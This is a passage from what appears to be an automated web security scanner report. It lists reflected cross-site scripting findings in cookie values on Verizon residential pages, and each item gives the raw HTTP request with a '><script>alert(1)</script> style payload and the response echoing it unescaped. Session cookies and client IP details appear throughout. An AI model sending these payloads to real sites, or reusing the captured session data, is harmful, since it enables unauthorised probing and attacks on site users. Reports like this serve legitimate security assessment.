MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57967
Expires: Sat, 20 Nov 2010 03:14:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6487d'><script>alert(1)</script>b45a269dda5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6487D'><SCRIPT>ALERT(1)</SCRIPT>B45A269DDA5 ' />
...[SNIP]...

3.207. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5315'><script>alert(1)</script>2c1f456c2c6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf5315'><script>alert(1)</script>2c1f456c2c6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 03:14:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf5315'><script>alert(1)</script>2c1f456c2c6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5315'><SCRIPT>ALERT(1)</SCRIPT>2C1F456C2C6 ' />
...[SNIP]...

3.208. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86aaa<script>alert(1)</script>b944052706a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86aaa<script>alert(1)</script>b944052706a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57997
Expires: Sat, 20 Nov 2010 03:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX86aaa<script>alert(1)</script>b944052706a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86AAA<SCRIPT>ALERT(1)</SCRIPT>B944052706A </DIV>
...[SNIP]...

3.209. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 00:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE0CE9'><SCRIPT>ALERT(1)</SCRIPT>6AE6011D9F2 ' />
...[SNIP]...

3.210. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1afe5<script>alert(1)</script>103649a90a9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1afe5<script>alert(1)</script>103649a90a9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57996
Expires: Sat, 20 Nov 2010 00:09:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1afe5<script>alert(1)</script>103649a90a9; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1AFE5<SCRIPT>ALERT(1)</SCRIPT>103649A90A9 </DIV>
...[SNIP]...

3.211. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e1d4d<script>alert(1)</script>f1881c1417d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXe1d4d<script>alert(1)</script>f1881c1417d; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94418
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe1d4d<script>alert(1)</script>f1881c1417d; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE1D4D<SCRIPT>ALERT(1)</SCRIPT>F1881C1417D </DIV>
...[SNIP]...

3.212. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 136fa'><script>alert(1)</script>a9a22c4e567 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; 